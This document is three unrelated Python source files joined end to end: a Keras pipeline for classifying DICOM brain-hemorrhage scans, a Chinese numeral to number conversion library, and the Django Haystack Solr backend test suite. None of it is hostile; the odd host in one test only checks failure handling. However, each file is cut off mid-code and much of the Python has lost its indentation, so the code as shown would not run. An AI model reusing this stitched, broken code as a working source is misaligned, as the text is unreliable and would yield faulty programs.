for file in os.listdir(path):
if file.endswith(".dcm"):
dcm_img_path.append(file)
dcm_img_path = [os.path.join(path, file) for file in dcm_img_path]
for image in dcm_img_path:
# delete images the program cannot read
try:
im = pydicom.read_file(image).pixel_array
        except:
            #os.remove(image)
            df.drop(df[df['ID'] == image.split('//')[-1]].index.tolist() , inplace = True)
            continue  # 'im' was never assigned for this image; skip the shape check
if im.shape != (w, l):
df.drop(df[df['ID'] == image.split('//')[-1]].index.tolist() , inplace = True)
return df
def randomly_select_img(df, size_per_cls):
"""randomly select image index from image dataframe and return a list
of indices to slice dataframe. It selects images to balance the classes
"""
# list to hold the randomly generated index
index_list = []
c = {'epidural' , 'intraparenchymal', 'intraventricular', 'subarachnoid', 'subdural'}
# the number of combinations
for i in range(1, 6):
comb = combinations(df.columns[2:], i)
for j in comb: # run combination
hold_format = []
no_disease = c.difference(set(j))
for no_dis in no_disease:
hold_format.append([no_dis, '==', 0])
for dis in set(j):
hold_format.append([dis, '!=', 0])
sql = """({} {} {}) & ({} {} {}) & ({} {} {}) & ({} {} {}) & ({} {} {})
""".format(*itertools.chain.from_iterable(hold_format))
try:
result = np.random.choice(df.query(sql).index.tolist(), size = size_per_cls, replace = False)
# if len(df.filter) < size_per_cls return the whole index
except ValueError:
result = df.query(sql).index.tolist()
# add indices to kindex list
for res in result:
index_list.append(res)
#continue
# add index of with no disease
result = np.random.choice(df.query('any == 0').index.tolist(), size = len(index_list), replace = False)
for res in result:
index_list.append(res)
return index_list
def copy_img_to_folder(df, path_sou, path_des):
"""copy images(filename) in dataframe to a destinated folder denoted
by path_des. Assumes that the column to extract the filenames from
is 'ID'
"""
for file in df["ID"]:
        shutil.copyfile(os.path.join(path_sou, file), os.path.join(path_des, file))
return None
def train_test_split_image(mainPath, test_size):
"""Creates subfolders for training and test split for image data set
by randomly drawing without replacement from each class/label.
Input: mainPath -- path to the main/parent folder of the image data
test_size -- percentage of image to split for test
Return: paths to the parent folders of the image test data and image train data
These are the paths you give to image generator (keras)
Warning: This function creates a copy of the image data so watch out if you have lots of images.
You might also want to delete the parent folders created by this function after you're done with
this assignment (since it creates a duplicate of images you already have).
This is how you call the function:
X_train_path, X_test_path = train_test_split_image("your_path", test_size = 0.2)
"""
import os
import shutil
# number of folders in mainPath
num_classes = len(os.listdir(mainPath))
# Labels or class or taget list
labels = os.listdir(mainPath)
# main folder names
folder_name_train = mainPath.split('\\')[-1:][0] + '_train'
folder_name_test = mainPath.split('\\')[-1:][0] + '_test'
# main folder path
train_path = mainPath.split('\\')[:-1]
train_path.append(folder_name_train)
test_path = mainPath.split('\\')[:-1]
test_path.append(folder_name_test)
# create path name
train_path = '\\'.join(train_path)
test_path = '\\'.join(test_path)
# create main folders for train and test data
for path in [train_path, test_path]:
success = False
if not os.path.exists(path):
os.mkdir(path)
success = True
else:
print("Directory " , path , " already exists")
# create subfolders under the folders just created
if success:
for class_label in labels:
os.mkdir(train_path +'\\'+ class_label)
os.mkdir(test_path +'\\'+ class_label)
# A dict to hold the number of images to extract for test size -- key:class, value: test_size
num_test_images = {}
for class_name in labels:
images = os.listdir(mainPath +'\\'+ class_name)
count = len(images)
num_test_images[class_name] = int(count * test_size)
# randomly pick images for test without replacement
test_set = np.random.choice(images, size = num_test_images[class_name], replace = False)
# copy images to train and test folder
# copy to test folder
for i in test_set:
shutil.copy(src = mainPath +'\\'+ class_name + '\\' + i , dst = test_path +'\\' + class_name + '\\' + i )
# copy remaining images to training folder
for j in set(images).difference(set(test_set)):
shutil.copy(src = mainPath +'\\'+ class_name + '\\' + j , dst = train_path +'\\'+ class_name + '\\' + j )
return train_path, test_path
def onehot(df, columns = ['no_disease', 'disease']):
"""one hot encodes a column vector of 1s and 0s
returns None type. Works on the dataframe as not object
"""
encode = OneHotEncoder(categories='auto')
y_onehot = encode.fit_transform(df.loc[:, 'any'].values.reshape(-1,1))
y_onehot = pd.DataFrame(y_onehot.toarray()).astype(int)
y_onehot.columns = columns
for i in columns:
df[i] = y_onehot[i]
return None
def graph_wight_violin(dict_wght, fig_size=(15,11)):
"""Graph two violin plots: one for the weights and another for bias
df_weight -- dictionary of weights and biases
Returns: plots
"""
sns.set(rc={'figure.figsize':fig_size})
sns.set_context("poster")
dict_wght_df = pd.DataFrame(dict([ (k,pd.Series(v)) for k,v in dict_wght.items()]))
sns.set()#style="whitegrid")
ax = sns.violinplot(x="Groups", y="Values", data=dict_wght_df.melt(var_name='Groups', value_name='Values'), inner='box')
ax.set_title('Distribution of Weights and Biases')
return plt.show()
# In[3]:
#path_folder = r"D:\ai_final_train_img_2"
#path_folder_to = r"D:\ai_final_train_img_2_jpg"
#df_path = r"D:\df_2"
#convert_dicom(path_folder, path_folder_to)
# you are only using 2 columns
#df = pd.read_excel(df_path, usecols = ['ID', 'any'], dtypes = {'ID':str, 'any':int})
# # Classes
# In[4]:
class image_gen_ai: #( tf.keras.preprocessing.image):
def __init__(self, image_size, batch, class_mod):
self.target_size = image_size
self.batch_size = batch
self.class_mode = class_mod
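    # A hypothetical instantiation (argument values are illustrative only):
    #   gen = image_gen_ai(image_size=(224, 224), batch=32, class_mod='raw')
    # 'raw' is the class_mode flow_from_dataframe expects when y_col lists
    # several numeric label columns, as in the generators below.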
def create_train_gen(self, df, path, y_col = ['no_disease', 'disease']):
train = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
train_gen = train.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
seed = 42,
shuffle = True,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return train_gen
def train_gen_model2(self, df, path, y_col = ['epidural','intraparenchymal', 'intraventricular','subarachnoid','subdural']):
train = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
train_gen2 = train.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
seed = 42,
shuffle = False,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return train_gen2
def create_val_gen(self, df, path, y_col = ['no_disease', 'disease']):
val = ImageDataGenerator(rescale = 1./255,
shear_range = 0.2,
zoom_range = 0.2,
rotation_range = 15,
width_shift_range = 0.2,
height_shift_range= 0.2,
horizontal_flip = True
)
        val_gen = val.flow_from_dataframe(
dataframe = df,
directory = path,
x_col = "ID",
y_col = y_col,
batch_size = self.batch_size,
shuffle = True,
class_mode = self.class_mode,
target_size= self.target_size,
validate_filenames=False
)
return val_gen
def create_test_gen(self, df, path):
test = ImageDataGenerator(rescale=1./255)
test_gen = test.flow_from_dataframe(
dataframe = | |
<reponame>begeekmyfriend/cn-text-normalizer
# coding: utf-8
# The MIT License (MIT)
# Copyright (c) 2015 by <NAME> (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
''' Chinese number <=> int/float conversion methods '''
__author__ = '<NAME> <<EMAIL>>; <NAME> <<EMAIL>>'
__version__ = '2018-06-01'
if 'constants': # for code folding
CHINESE_DIGIS = u'零一二三四五六七八九'
BIG_CHINESE_DIGIS_SIMPLIFIED = u'零壹贰叁肆伍陆柒捌玖'
BIG_CHINESE_DIGIS_TRADITIONAL = u'零壹貳參肆伍陸柒捌玖'
SMALLER_BIG_CHINESE_UNITS_SIMPLIFIED = u'十百千万'
SMALLER_BIG_CHINESE_UNITS_TRADITIONAL = u'拾佰仟萬'
LARGER_CHINESE_NUMERING_UNITS_SIMPLIFIED = u'亿兆京垓秭穰沟涧正载'
LARGER_CHINESE_NUMERING_UNITS_TRADITIONAL = u'億兆京垓秭穰溝澗正載'
SMALLER_CHINESE_NUMERING_UNITS_SIMPLIFIED = u'十百千万'
SMALLER_CHINESE_NUMERING_UNITS_TRADITIONAL = u'拾佰仟萬'
ZERO_ALT = u'〇'
TWO_ALTS = [u'两', u'兩']
POSITIVE = [u'正', u'正']
NEGATIVE = [u'负', u'負']
POINT = [u'点', u'點']
NUMBERING_TYPES = ['low', 'mid', 'high']
if 'class definitions': # for code folding
class ChineseChar(object):
"""
        Chinese characters.
        Each has simplified and traditional strings,
        e.g. simplified = '负', traditional = '負'.
        When converted to a string, it shows the simplified string, the traditional string, or None.
"""
def __init__(self, simplified, traditional):
self.simplified = simplified
self.traditional = traditional
self.__repr__ = self.__str__
def __str__(self):
return self.simplified or self.traditional or None
def __repr__(self):
return self.__str__()
class ChineseNumberUnit(ChineseChar):
"""
        Chinese number unit.
        Each is a ChineseChar with additional "big" (capital) form strings,
        e.g. '陆' and '陸'.
"""
def __init__(self, power, simplified, traditional, big_s, big_t):
super(ChineseNumberUnit, self).__init__(simplified, traditional)
self.power = power
self.big_s = big_s
self.big_t = big_t
def __str__(self):
return '10^{}'.format(self.power)
@classmethod
def create(cls, index, value, numbering_type=NUMBERING_TYPES[1], small_unit=False):
if small_unit:
return ChineseNumberUnit(power=index + 1,
simplified=value[0], traditional=value[1], big_s=value[1], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[0]:
return ChineseNumberUnit(power=index + 8,
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[1]:
return ChineseNumberUnit(power=(index + 2) * 4,
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
elif numbering_type == NUMBERING_TYPES[2]:
return ChineseNumberUnit(power=pow(2, index + 3),
simplified=value[0], traditional=value[1], big_s=value[0], big_t=value[1])
else:
raise ValueError(
'Counting type should be in {0} ({1} provided).'.format(NUMBERING_TYPES, numbering_type))
class ChineseNumberDigi(ChineseChar):
def __init__(self, value, simplified, traditional, big_s, big_t, alt_s=None, alt_t=None):
super(ChineseNumberDigi, self).__init__(simplified, traditional)
self.value = value
self.big_s = big_s
self.big_t = big_t
self.alt_s = alt_s
self.alt_t = alt_t
def __str__(self):
return str(self.value)
@classmethod
def create(cls, i, v):
return ChineseNumberDigi(i, v[0], v[1], v[2], v[3])
class ChineseMath(ChineseChar):
def __init__(self, simplified, traditional, symbol, expression=None):
super(ChineseMath, self).__init__(simplified, traditional)
self.symbol = symbol
self.expression = expression
self.big_s = simplified
self.big_t = traditional
CC, CNU, CND, CM = ChineseChar, ChineseNumberUnit, ChineseNumberDigi, ChineseMath
class CountingSystem(object):
pass
class MathSymbols(object):
"""
Math symbols used in a Chinese number counting system (for both traditional and simplified Chinese), e.g.
positive = ['正', '正']
negative = ['负', '負']
point = ['点', '點']
"""
def __init__(self, positive, negative, point):
self.positive = positive
self.negative = negative
self.point = point
def __iter__(self):
for v in self.__dict__.values():
yield v
if 'create systems': # for code folding
def create_system(numbering_type=NUMBERING_TYPES[1]):
"""
Create a numbering system depends on the numbering system type.
NUMBERING_TYPES = ['low', 'mid', 'high']: Chinese numbering system type.
low: '兆' = '亿' * '十' = $10^{9}$, '京' = '兆' * '十', etc.
mid: '兆' = '亿' * '万' = $10^{12}$, '京' = '兆' * '万', etc.
high: '兆' = '亿' * '亿' = $10^{16}$, '京' = '兆' * '兆', etc.
Returns a number counting system.
"""
# chinese number units of '亿' and larger
all_larger_units = zip(
LARGER_CHINESE_NUMERING_UNITS_SIMPLIFIED, LARGER_CHINESE_NUMERING_UNITS_TRADITIONAL)
larger_units = [CNU.create(i, v, numbering_type, False)
for i, v in enumerate(all_larger_units)]
# chinese number units of '十, 百, 千, 万'
all_smaller_units = zip(
SMALLER_CHINESE_NUMERING_UNITS_SIMPLIFIED, SMALLER_CHINESE_NUMERING_UNITS_TRADITIONAL)
smaller_units = [CNU.create(i, v, small_unit=True)
for i, v in enumerate(all_smaller_units)]
# digis
chinese_digis = zip(CHINESE_DIGIS, CHINESE_DIGIS,
BIG_CHINESE_DIGIS_SIMPLIFIED, BIG_CHINESE_DIGIS_TRADITIONAL)
digits = [CND.create(i, v) for i, v in enumerate(chinese_digis)]
digits[0].alt_s, digits[0].alt_t = ZERO_ALT, ZERO_ALT
digits[2].alt_s, digits[2].alt_t = TWO_ALTS[0], TWO_ALTS[1]
positive_cn = CM(POSITIVE[0], POSITIVE[1], '+', lambda x: x)
negative_cn = CM(NEGATIVE[0], NEGATIVE[1], '-', lambda x: -x)
point_cn = CM(POINT[0], POINT[1], '.', lambda x,
y: float(str(x) + '.' + str(y)))
system = CountingSystem()
system.units = smaller_units + larger_units
system.digits = digits
system.math = MathSymbols(positive_cn, negative_cn, point_cn)
return system
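# Illustration of the unit powers produced by CNU.create above: under the
# default 'mid' system 亿 = 10^8, 兆 = 10^12, 京 = 10^16 (each large unit is
# 万 times the previous one); under 'low' 兆 = 10^9, 京 = 10^10 (times 十);
# under 'high' 兆 = 10^16, 京 = 10^32 (each unit is the square of the previous).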
def cn2num(chinese_string, numbering_type=NUMBERING_TYPES[1]):
def get_symbol(char, system):
for u in system.units:
if char in [u.traditional, u.simplified, u.big_s, u.big_t]:
return u
for d in system.digits:
if char in [d.traditional, d.simplified, d.big_s, d.big_t, d.alt_s, d.alt_t]:
return d
for m in system.math:
if char in [m.traditional, m.simplified]:
return m
def string2symbols(chinese_string, system):
int_string, dec_string = chinese_string, ''
for p in [system.math.point.simplified, system.math.point.traditional]:
if p in chinese_string:
int_string, dec_string = chinese_string.split(p)
break
return [get_symbol(c, system) for c in int_string], \
[get_symbol(c, system) for c in dec_string]
def correct_symbols(integer_symbols, system):
"""
Insert omitted units and split stacked units, e.g.
一百八 -> 一百八十 (infer the omitted trailing unit)
一亿一千三百万 -> 一亿 一千万 三百万 (distribute the larger unit)
"""
if integer_symbols and isinstance(integer_symbols[0], CNU):
if integer_symbols[0].power == 1:
integer_symbols = [system.digits[1]] + integer_symbols
if len(integer_symbols) > 1:
if isinstance(integer_symbols[-1], CND) and isinstance(integer_symbols[-2], CNU):
integer_symbols.append(
CNU(integer_symbols[-2].power - 1, None, None, None, None))
result = []
unit_count = 0
for s in integer_symbols:
if isinstance(s, CND):
result.append(s)
unit_count = 0
elif isinstance(s, CNU):
current_unit = CNU(s.power, None, None, None, None)
unit_count += 1
if unit_count == 1:
result.append(current_unit)
elif unit_count > 1:
for i in range(len(result)):
if isinstance(result[-i - 1], CNU) and result[-i - 1].power < current_unit.power:
result[-i - 1] = CNU(result[-i - 1].power +
current_unit.power, None, None, None, None)
return result
def compute_value(integer_symbols):
"""
Compute the integer value.
When the current unit is larger than the previous one, it multiplies all
previously accumulated partial values instead of being added to them,
e.g. '两千万' = 2000 * 10000, not 2000 + 10000.
"""
value = [0]
last_power = 0
for s in integer_symbols:
if isinstance(s, CND):
value[-1] = s.value
elif isinstance(s, CNU):
value[-1] *= pow(10, s.power)
if s.power > last_power:
value[:-1] = list(map(lambda v: v *
pow(10, s.power), value[:-1]))
last_power = s.power
value.append(0)
return sum(value)
system = create_system(numbering_type)
int_part, dec_part = string2symbols(chinese_string, system)
int_part = correct_symbols(int_part, system)
int_value = compute_value(int_part)
dec_str = ''.join([str(d.value) for d in dec_part])
if dec_part:
return float('{0}.{1}'.format(str(int_value), dec_str))
else:
return int_value
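# A minimal usage sketch (doctest-style; expected values follow from the
# symbol tables and correction rules above):
#   >>> cn2num(u'一百八')
#   180
#   >>> cn2num(u'两千万')
#   20000000
#   >>> cn2num(u'一点五')
#   1.5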
def num2cn(num_str, numbering_type=NUMBERING_TYPES[0], big=False, traditional=False, alt_zero=False, alt_two=True, use_zeros=True, use_units=True):
def get_value(value_string, use_zeros=True):
striped_string = value_string.lstrip('0')
# record nothing if all zeros
if not striped_string:
return []
# record a single digit
elif len(striped_string) == 1:
if use_zeros and len(value_string) != len(striped_string):
return [system.digits[0], system.digits[int(striped_string)]]
else:
return [system.digits[int(striped_string)]]
# recursively record multiple digits
else:
result_unit = next(u for u in reversed(
system.units) if u.power < len(striped_string))
result_string = value_string[:-result_unit.power]
return get_value(result_string) + [result_unit] + get_value(striped_string[-result_unit.power:])
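# e.g. get_value('1234') selects 千 (the largest unit with power < 4) and
# recurses as get_value('1') + [千] + get_value('234'), ultimately yielding
# the symbols for 一千二百三十四.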
system = create_system(numbering_type)
int_dec = num_str.split('.')
if len(int_dec) == 1:
int_string = int_dec[0]
dec_string = ""
elif len(int_dec) == 2:
int_string = int_dec[0]
dec_string = int_dec[1]
else:
raise ValueError(
"invalid input num string with more than one dot: {}".format(num_str))
if use_units and len(int_string) > 1:
result_symbols = get_value(int_string)
else:
result_symbols = [system.digits[int(c)] for c in int_string]
dec_symbols = [system.digits[int(c)] for c in dec_string]
if dec_string:
result_symbols += [system.math.point] + dec_symbols
if alt_two:
liang = CND(2, system.digits[2].alt_s, system.digits[2].alt_t,
system.digits[2].big_s, system.digits[2].big_t)
for i, v in enumerate(result_symbols):
if isinstance(v, CND) and v.value == 2:
next_symbol = result_symbols[i +
1] if i < len(result_symbols) - 1 else None
previous_symbol = result_symbols[i - 1] if i > 0 else None
if isinstance(next_symbol, CNU) and isinstance(previous_symbol, (CNU, type(None))):
if next_symbol.power != 1 and ((previous_symbol is None) or (previous_symbol.power != 1)):
result_symbols[i] = liang
# if big is True, '两' will not be used and `alt_two` has no effect on the output
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
import datetime
from decimal import Decimal
import os
import logging as std_logging
from mock import patch
import pysolr
from django.conf import settings
from django.test import TestCase
from haystack import connections, reset_search_queries
from haystack import indexes
from haystack.inputs import AutoQuery, AltParser, Raw
from haystack.models import SearchResult
from haystack.query import SearchQuerySet, RelatedSearchQuerySet, SQ
from haystack.utils.loading import UnifiedIndex
from core.models import (MockModel, AnotherMockModel,
AFourthMockModel, ASixthMockModel)
from core.tests.mocks import MockSearchResult
test_pickling = True
try:
import cPickle as pickle
except ImportError:
try:
import pickle
except ImportError:
test_pickling = False
def clear_solr_index():
# Wipe it clean.
print('Clearing out Solr...')
raw_solr = pysolr.Solr(settings.HAYSTACK_CONNECTIONS['default']['URL'])
raw_solr.delete(q='*:*')
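# These tests assume a reachable Solr core configured in Django settings,
# along the lines of (a sketch -- the URL is deployment-specific):
#
#   HAYSTACK_CONNECTIONS = {
#       'default': {
#           'ENGINE': 'haystack.backends.solr_backend.SolrEngine',
#           'URL': 'http://localhost:9001/solr/default',
#       },
#   }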
class SolrMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
name = indexes.CharField(model_attr='author', faceted=True)
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return MockModel
class SolrMaintainTypeMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
month = indexes.CharField(indexed=False)
pub_date = indexes.DateField(model_attr='pub_date')
def prepare_month(self, obj):
return "%02d" % obj.pub_date.month
def get_model(self):
return MockModel
class SolrMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='foo', document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return MockModel
class SolrAnotherMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return AnotherMockModel
def prepare_text(self, obj):
return u"You might be searching for the user %s" % obj.author
class SolrBoostMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True,
template_name='search/indexes/core/mockmodel_template.txt'
)
author = indexes.CharField(model_attr='author', weight=2.0)
editor = indexes.CharField(model_attr='editor')
pub_date = indexes.DateField(model_attr='pub_date')
def get_model(self):
return AFourthMockModel
class SolrRoundTripSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, default='')
name = indexes.CharField()
is_active = indexes.BooleanField()
post_count = indexes.IntegerField()
average_rating = indexes.FloatField()
price = indexes.DecimalField()
pub_date = indexes.DateField()
created = indexes.DateTimeField()
tags = indexes.MultiValueField()
sites = indexes.MultiValueField()
def get_model(self):
return MockModel
def prepare(self, obj):
prepped = super(SolrRoundTripSearchIndex, self).prepare(obj)
prepped.update({
'text': 'This is some example text.',
'name': '<NAME>',
'is_active': True,
'post_count': 25,
'average_rating': 3.6,
'price': Decimal('24.99'),
'pub_date': datetime.date(2009, 11, 21),
'created': datetime.datetime(2009, 11, 21, 21, 31, 00),
'tags': ['staff', 'outdoor', 'activist', 'scientist'],
'sites': [3, 5, 1],
})
return prepped
class SolrComplexFacetsMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, default='')
name = indexes.CharField(faceted=True)
is_active = indexes.BooleanField(faceted=True)
post_count = indexes.IntegerField()
post_count_i = indexes.FacetIntegerField(facet_for='post_count')
average_rating = indexes.FloatField(faceted=True)
pub_date = indexes.DateField(faceted=True)
created = indexes.DateTimeField(faceted=True)
sites = indexes.MultiValueField(faceted=True)
def get_model(self):
return MockModel
class SolrAutocompleteMockModelSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='foo', document=True)
name = indexes.CharField(model_attr='author')
pub_date = indexes.DateField(model_attr='pub_date')
text_auto = indexes.EdgeNgramField(model_attr='foo')
name_auto = indexes.EdgeNgramField(model_attr='author')
def get_model(self):
return MockModel
class SolrSpatialSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
location = indexes.LocationField()
def prepare_location(self, obj):
return "%s,%s" % (obj.lat, obj.lon)
def get_model(self):
return ASixthMockModel
class SolrQuotingMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
def get_model(self):
return MockModel
def prepare_text(self, obj):
return u"""Don't panic but %s has been iñtërnâtiônàlizéð""" % obj.author
class SolrSearchBackendTestCase(TestCase):
def setUp(self):
super(SolrSearchBackendTestCase, self).setUp()
# Wipe it clean.
self.raw_solr = pysolr.Solr(settings.HAYSTACK_CONNECTIONS['default']['URL'])
clear_solr_index()
# Stow.
self.old_ui = connections['default'].get_unified_index()
self.ui = UnifiedIndex()
self.smmi = SolrMockSearchIndex()
self.smtmmi = SolrMaintainTypeMockSearchIndex()
self.ui.build(indexes=[self.smmi])
connections['default']._index = self.ui
self.sb = connections['default'].get_backend()
self.sq = connections['default'].get_query()
self.sample_objs = []
for i in range(1, 4):
mock = MockModel()
mock.id = i
mock.author = 'daniel%s' % i
mock.pub_date = datetime.date(2009, 2, 25) - datetime.timedelta(days=i)
self.sample_objs.append(mock)
def tearDown(self):
connections['default']._index = self.old_ui
super(SolrSearchBackendTestCase, self).tearDown()
def test_non_silent(self):
bad_sb = connections['default'].backend('bad', URL='http://omg.wtf.bbq:1000/solr', SILENTLY_FAIL=False, TIMEOUT=1)
# Each of these backend operations must raise against an unreachable Solr
# when SILENTLY_FAIL is False; a bare except would also swallow the
# AssertionError from self.fail(), so assert the failures explicitly.
with self.assertRaises(Exception):
bad_sb.update(self.smmi, self.sample_objs)
with self.assertRaises(Exception):
bad_sb.remove('core.mockmodel.1')
with self.assertRaises(Exception):
bad_sb.clear()
with self.assertRaises(Exception):
bad_sb.search('foo')
def test_update(self):
self.sb.update(self.smmi, self.sample_objs)
results = self.raw_solr.search('*:*')
for result in results:
del result['_version_']
# Check what Solr thinks is there.
self.assertEqual(results.hits, 3)
self.assertEqual(results.docs, [
{
'django_id': '1',
'django_ct': 'core.mockmodel',
'name': 'daniel1',
'name_exact': 'daniel1',
'text': 'Indexed!\n1',
'pub_date': '2009-02-24T00:00:00Z',
'id': 'core.mockmodel.1'
},
{
'django_id': '2',
'django_ct': 'core.mockmodel',
'name': 'daniel2',
'name_exact': 'daniel2',
'text': 'Indexed!\n2',
'pub_date': '2009-02-23T00:00:00Z',
'id': 'core.mockmodel.2'
},
{
'django_id': '3',
'django_ct': 'core.mockmodel',
'name': 'daniel3',
'name_exact': 'daniel3',
'text': 'Indexed!\n3',
'pub_date': '2009-02-22T00:00:00Z',
'id': 'core.mockmodel.3'
}
])
def test_remove(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.remove(self.sample_objs[0])
results = self.raw_solr.search('*:*')
for result in results:
del result['_version_']
self.assertEqual(results.hits, 2)
self.assertEqual(results.docs, [
{
'django_id': '2',
'django_ct': 'core.mockmodel',
'name': 'daniel2',
'name_exact': 'daniel2',
'text': 'Indexed!\n2',
'pub_date': '2009-02-23T00:00:00Z',
'id': 'core.mockmodel.2'
},
{
'django_id': '3',
'django_ct': 'core.mockmodel',
'name': 'daniel3',
'name_exact': 'daniel3',
'text': 'Indexed!\n3',
'pub_date': '2009-02-22T00:00:00Z',
'id': 'core.mockmodel.3'
}
])
def test_clear(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear()
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([AnotherMockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([MockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.sb.clear([AnotherMockModel, MockModel])
self.assertEqual(self.raw_solr.search('*:*').hits, 0)
def test_search(self):
self.sb.update(self.smmi, self.sample_objs)
self.assertEqual(self.raw_solr.search('*:*').hits, 3)
self.assertEqual(self.sb.search(''), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*')['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*')['results']], ['1', '2', '3'])
self.assertEqual(self.sb.search('', highlight=True), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('Index', highlight=True)['hits'], 3)
self.assertEqual([result.highlighted['text'][0] for result in self.sb.search('Index', highlight=True)['results']], ['<em>Indexed</em>!\n1', '<em>Indexed</em>!\n2', '<em>Indexed</em>!\n3'])
self.assertEqual(self.sb.search('Indx')['hits'], 0)
self.assertEqual(self.sb.search('indax')['spelling_suggestion'], 'index')
self.assertEqual(self.sb.search('Indx', spelling_query='indexy')['spelling_suggestion'], 'index')
self.assertEqual(self.sb.search('', facets={'name': {}}), {'hits': 0, 'results': []})
results = self.sb.search('Index', facets={'name': {}})
self.assertEqual(results['hits'], 3)
self.assertEqual(results['facets']['fields']['name'], [('daniel1', 1), ('daniel2', 1), ('daniel3', 1)])
self.assertEqual(self.sb.search('', date_facets={'pub_date': {'start_date': datetime.date(2008, 2, 26), 'end_date': datetime.date(2008, 3, 26), 'gap_by': 'month', 'gap_amount': 1}}), {'hits': 0, 'results': []})
results = self.sb.search('Index', date_facets={'pub_date': {'start_date': datetime.date(2008, 2, 26), 'end_date': datetime.date(2008, 3, 26), 'gap_by': 'month', 'gap_amount': 1}})
self.assertEqual(results['hits'], 3)
# DRL_TODO: Correct output but no counts. Another case of needing better test data?
# self.assertEqual(results['facets']['dates']['pub_date'], {'end': '2008-02-26T00:00:00Z', 'gap': '/MONTH'})
self.assertEqual(self.sb.search('', query_facets=[('name', '[* TO e]')]), {'hits': 0, 'results': []})
results = self.sb.search('Index', query_facets=[('name', '[* TO e]')])
self.assertEqual(results['hits'], 3)
self.assertEqual(results['facets']['queries'], {'name:[* TO e]': 3})
self.assertEqual(self.sb.search('', stats={}), {'hits':0,'results':[]})
results = self.sb.search('*:*', stats={'name':['name']})
self.assertEqual(results['hits'], 3)
self.assertEqual(results['stats']['name']['count'], 3)
self.assertEqual(self.sb.search('', narrow_queries=set(['name:daniel1'])), {'hits': 0, 'results': []})
results = self.sb.search('Index', narrow_queries=set(['name:daniel1']))
self.assertEqual(results['hits'], 1)
# Ensure that swapping the ``result_class`` works.
self.assertTrue(isinstance(self.sb.search(u'index document', result_class=MockSearchResult)['results'][0], MockSearchResult))
# Check the use of ``limit_to_registered_models``.
self.assertEqual(self.sb.search('', limit_to_registered_models=False), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*', limit_to_registered_models=False)['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*', limit_to_registered_models=False)['results']], ['1', '2', '3'])
# Stow.
old_limit_to_registered_models = getattr(settings, 'HAYSTACK_LIMIT_TO_REGISTERED_MODELS', True)
settings.HAYSTACK_LIMIT_TO_REGISTERED_MODELS = False
self.assertEqual(self.sb.search(''), {'hits': 0, 'results': []})
self.assertEqual(self.sb.search('*:*')['hits'], 3)
self.assertEqual([result.pk for result in self.sb.search('*:*')['results']], ['1', '2', '3'])
# Restore.
settings.HAYSTACK_LIMIT_TO_REGISTERED_MODELS = old_limit_to_registered_models
def test_altparser_query(self):
